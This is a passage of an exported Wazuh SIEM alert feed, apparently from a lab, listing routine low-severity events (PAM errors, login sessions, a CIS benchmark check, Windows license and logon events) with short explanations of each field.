
🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:45.510+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM misconfiguration.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5553
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533785.34367
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:29:45.348195+00:00 server1 login[1202]: PAM unable to dlopen(pam_lastlog.so): /usr/lib/security/pam_lastlog.so: cannot open shared object file: No such file or directory
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  login
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:29:45.348195+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Wazuh server started.

🧠 What happened? Wazuh server started.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:29:52.672+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:52.672+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Wazuh server started.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  502
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533792.34782
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  ossec: Manager started.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

location:  wazuh-monitord
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:29:53.531+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:53.531+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533793.35029
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:29:53.449652+00:00 server1 login[1202]: pam_unix(login:session): session opened for user simba(uid=1000) by simba(uid=0)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  login
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:29:53.449652+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  simba(uid=1000)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.uid:  0
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:29:55.530+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:55.530+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533795.35488
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:29:53.669158+00:00 server1 (systemd): pam_unix(systemd-user:session): session opened for user simba(uid=1000) by simba(uid=0)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  (systemd)
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:29:53.669158+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  simba(uid=1000)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.uid:  0
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:19.981+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:19.981+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533879.35952
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26000
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Enforce password history' is set to '24 or more password(s)'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines the number of renewed, unique passwords that have to be associated with a user account before you can reuse an old password. The value for this policy setting must be between 0 and 24 passwords. The default value for Windows Vista is 0 passwords, but the default setting in a domain is 24 passwords. To maintain the effectiveness of this policy setting, use the Minimum password age setting to prevent users from repeatedly changing their password. The recommended state for this setting is: 24 or more password(s). Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Note #2: As of the publication of this benchmark, Microsoft currently has a maximum limit of 24 saved passwords. For more information, please visit Enforce password history (Windows 10) - Windows security | Microsoft Docs
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The longer a user uses the same password, the greater the chance that an attacker can determine the password through brute force attacks. Also, any accounts that may have been compromised will remain exploitable for as long as the password is left unchanged. If password changes are required but password reuse is not prevented, or if users continually reuse a small number of passwords, the effectiveness of a good password policy is greatly reduced. If you specify a low number for this policy setting, users will be able to use the same small number of passwords repeatedly. If you do not also configure the Minimum password age setting, users might repeatedly change their passwords until they can reuse their original password.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 24 or more password(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Enforce password history
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'net.exe accounts'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

License activation (slui.exe) failed.

🧠 What happened? License activation (slui.exe) failed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:21.417+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:21.417+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  License activation (slui.exe) failed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60646
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533881.42181
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  8198
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:43.0293769Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2351
Incremental log record number – handy for timeline order.

data.win.system.processID:  9692
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "License Activation (slui.exe) failed with the following error code: hr=0x80004005 Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:21.928+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:21.928+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533881.44501
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:04.3626123Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43449
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:22.030+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:22.030+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533882.51836
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
